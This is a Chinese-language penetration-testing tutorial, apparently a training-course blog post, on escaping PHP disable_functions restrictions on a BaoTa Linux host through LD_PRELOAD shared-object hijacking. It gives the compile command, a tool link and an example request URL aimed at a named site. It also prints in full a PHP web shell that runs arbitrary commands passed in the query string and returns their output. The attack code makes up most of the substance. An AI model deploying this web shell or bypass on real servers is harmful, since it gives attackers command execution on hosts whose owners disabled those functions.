[原创]WEB安全第八章实战篇02 绕过Bypass disable_functions 提权
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
WEB安全第八章实战篇02 绕过Bypass disable_functions 提权
1.环境
宝塔linux主机
主机系统类型 centos php版本 5.4
![[原创]WEB安全第八章实战篇02 绕过Bypass disable_functions 提权](https://www.moonsec.com/wp-content/uploads/2019/12/image001.png)
![[原创]WEB安全第八章实战篇02 绕过Bypass disable_functions 提权](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
2.禁用函数
禁用这些执行命令的函数,导致无法执行命令。
![[原创]WEB安全第八章实战篇02 绕过Bypass disable_functions 提权](https://www.moonsec.com/wp-content/uploads/2019/12/image002.png)
![[原创]WEB安全第八章实战篇02 绕过Bypass disable_functions 提权](https://www.moonsec.com/wp-content/uploads/2019/12/image003.png)
3.绕过方法
劫持函数 劫持共享对象 执行命令
cc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so -ldl
根据目标架构编译成不同版本
编译成x86要加上 -m32
下载地址
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
http://swww.apt999.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/www/wwwroot/www.apt999.com/bypass_disablefunc_x64.so
![[原创]WEB安全第八章实战篇02 绕过Bypass disable_functions 提权](https://www.moonsec.com/wp-content/uploads/2019/12/image004-1024x712.png)
bypass_disablefunc.php
[php]
<?php
echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";
$cmd = $_GET["cmd"];
$out_path = $_GET["outpath"];
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";
putenv("EVIL_CMDLINE=" . $evil_cmdline);
$so_path = $_GET["sopath"];
putenv("LD_PRELOAD=" . $so_path);
mail("", "", "", "");
echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";
unlink($out_path);
?>
[/php]
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/612.html
mOon 